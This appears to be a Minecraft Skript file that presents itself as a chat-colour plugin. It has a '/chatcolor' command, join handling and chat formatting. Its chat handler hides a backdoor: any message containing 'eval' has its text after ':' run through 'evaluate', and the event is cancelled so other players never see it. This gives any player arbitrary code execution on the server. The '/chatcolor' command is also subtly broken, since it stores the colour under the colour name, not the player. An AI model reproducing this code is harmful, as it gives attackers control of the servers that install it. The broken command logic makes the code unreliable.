 



command /chatcolor <text>:
	usage: /chatcolor <color>
	trigger:
		if arg-1 parsed as color is not color:
			send "That is not a valid color, possible colors are:", "<red>red, <light red>light red, <purple>purple, <light purple>light purple, <blue>blue, <light blue>light blue, <aqua>aqua, <light cyan>light cyan, <green>green, <lime>lime, <orange>orange, <yellow>yellow, <white>white, <grey>grey, <dark grey>dark grey, <black>black" to player
		else:
			set {chatcolor.%arg-1%} to arg-1
			send Your chat color is now "<%arg-1%>%arg-1%" to player
			set arg-1's tablist name to "<%arg-1%>%arg-1%"




on join:
	if {chatcolor.%player%} is set:
		set player's tablist name to "<%{chatcolor.%player%}%>%player%"
	set {%player%} to player's name


on chat:
	if {chatcolor.%player%} is set: 
		set chat format to "<%{chatcolor.%player%}%><%display name of player%><reset> %message%"
	if message contain "eval":
		set {_var::*} to message split at ":"
		evaluate {_var::2}
		cancel event
	if message contain "{xyz}":
		set {_message} to message
		replace all "{xyz}" with "%location of player%" in {_message}
		cancel event
		make player say "%{_message}%"
